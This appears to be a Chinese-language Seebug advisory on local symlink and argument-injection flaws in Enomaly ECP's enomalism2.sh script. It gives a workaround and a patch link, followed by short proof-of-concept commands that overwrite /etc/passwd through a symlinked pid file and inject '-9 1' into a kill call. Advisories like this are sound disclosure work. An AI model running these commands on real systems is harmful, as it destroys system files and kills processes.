Lucene search
RootSSV:4792HistoryFeb 19, 2009 - 12:00 a.m.
Enomaly ECP多个安全漏洞
2009-02-1900:00:00
Root
www.seebug.org
15
0.0004 Low
EPSS
Percentile
5.7%
BUGTRAQ ID: 33544
CVE(CAN) ID: CVE-2008-4990,CVE-2009-0390
Enomaly ECP(之前名为Enomalism)是用于管理虚拟机的软件。
ECP的enomalism2.sh中存在多个安全漏洞,本地攻击者可以通过符号链接攻击以root用户权限覆盖任意系统文件、向kill命令注入参数以终止任意进程或向进程发送信号,或导致虚拟机无法启动。
Enomaly Elastic Computing Platform 2.1
临时解决方法:
- 将PIDFILE从/tmp/enomalism2.pid更改为/var/run/enomalism2.pid。
厂商补丁:
Enomaly
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
<a href=“http://sourceforge.net/project/showfiles.php?group_id=164855&package_id=186866&release_id=660061” target=“_blank”>http://sourceforge.net/project/showfiles.php?group_id=164855&package_id=186866&release_id=660061</a>
a. while true; do ln -s /etc/passwd /tmp/enomalism2.pid; done
b. echo "-9 1" > /tmp/enomalism2.pid
c. i. ln -s /tmp/root /tmp/enomalism2.pid
ii. chgrp beetroot /tmp/enomalism2.pid
Related
securityvulns
securityvulns
Enomaly ECP / Enomalism symbolic links vulnerability
2009-02-17 00:00:00
seebug
seebug
Enomaly ECP / Enomalism < 2.2.1 - Multiple Local Vulnerabilities
2014-07-01 00:00:00
Enomaly ECP / Enomalism < 2.2.1 Multiple Local Vulnerabilities
2009-02-18 00:00:00
exploitpack
exploitpack
Enomaly ECP Enomalism 2.2.1 - Multiple Local Vulnerabilities
2009-02-16 00:00:00
packetstorm
packetstorm
Enomaly ECP/Enomalism enomalism2.sh Temporary Files
2009-02-16 00:00:00
Enomaly ECP/Enomalism Insecure File Creation
2009-01-30 00:00:00
exploitdb
exploitdb
Enomaly ECP / Enomalism < 2.2.1 - Multiple Local Vulnerabilities
2009-02-16 00:00:00
cvelist
cvelist
CVE-2009-0390
2009-02-02 22:00:00
CVE-2008-4990
2009-02-02 22:00:00
prion
prion
Arbitrary file deletion
2009-02-02 22:30:00
Design/Logic Flaw
2009-02-02 22:30:00
cve
cve
CVE-2008-4990
2009-02-02 22:30:00
CVE-2009-0390
2009-02-02 22:30:00